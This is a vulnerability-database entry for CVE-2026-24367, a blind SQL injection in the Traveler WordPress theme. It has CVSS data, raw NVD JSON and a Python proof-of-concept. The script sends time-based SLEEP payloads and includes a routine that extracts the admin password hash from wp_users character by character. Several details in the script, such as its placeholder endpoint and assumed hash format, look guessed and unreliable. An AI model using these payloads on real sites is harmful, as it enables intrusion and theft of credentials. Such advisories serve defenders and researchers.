Security Vulnerability Report
中文
CVE-2026-24367 CVSS 8.5 HIGH

CVE-2026-24367

Published: 2026-01-22 17:16:40
Last Modified: 2026-04-28 15:16:07

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through < 3.2.8.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Traveler主题 < 3.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2026-24367 Blind SQL Injection PoC # Target: WordPress site with Traveler theme < 3.2.8 target_url = "http://target-site.com/" # Blind SQL Injection payload for extracting database version def test_blind_sql_injection(): # Payload to test if vulnerability exists # Using time-based blind SQL injection # Normal request baseline start_time = time.time() normal_response = requests.get(target_url, timeout=10) normal_time = time.time() - start_time # SQL Injection test payload (example pattern) # In real attack, this would be injected into vulnerable parameter sql_payload = "' AND (SELECT * FROM (SELECT(SLEEP(5)))test)---" # Example vulnerable endpoint (would need enumeration) vulnerable_endpoint = target_url + "?s=" + sql_payload print(f"Testing for CVE-2026-24367...") print(f"Vulnerable endpoint pattern: {vulnerable_endpoint}") print(f"Normal response time: {normal_time:.2f}s") try: start_time = time.time() response = requests.get(vulnerable_endpoint, timeout=30) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] Vulnerability confirmed! Response delay: {elapsed:.2f}s") print("[+] Time-based blind SQL injection is possible") else: print(f"[-] No vulnerability detected") except requests.exceptions.Timeout: print("[+] Vulnerability confirmed (request timeout)") except Exception as e: print(f"[-] Error: {e}") # Binary search for data extraction def extract_data_via_blind_sql(): # Example: Extract admin password hash character by character # This is a simplified demonstration charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" extracted = "" for position in range(1, 33): # Assuming MD5 hash length for char in charset: # Payload pattern for character extraction payload = f"' AND (SELECT CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{position},1)='{char}') THEN SLEEP(3) ELSE 0 END)---" # Make request and measure response time try: start = time.time() requests.get(target_url + "?s=" + payload, timeout=10) elapsed = time.time() - start if elapsed >= 3: extracted += char print(f"Position {position}: {char} (partial: {extracted})") break except: pass print(f"\n[+] Extracted hash: {extracted}") return extracted if __name__ == "__main__": test_blind_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24367", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:40.183", "lastModified": "2026-04-28T15:16:06.840", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through < 3.2.8."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en shinetheme Traveler traveler permite Inyección SQL Ciega. Este problema afecta a Traveler: desde n/a hasta &lt; 3.2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-8-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}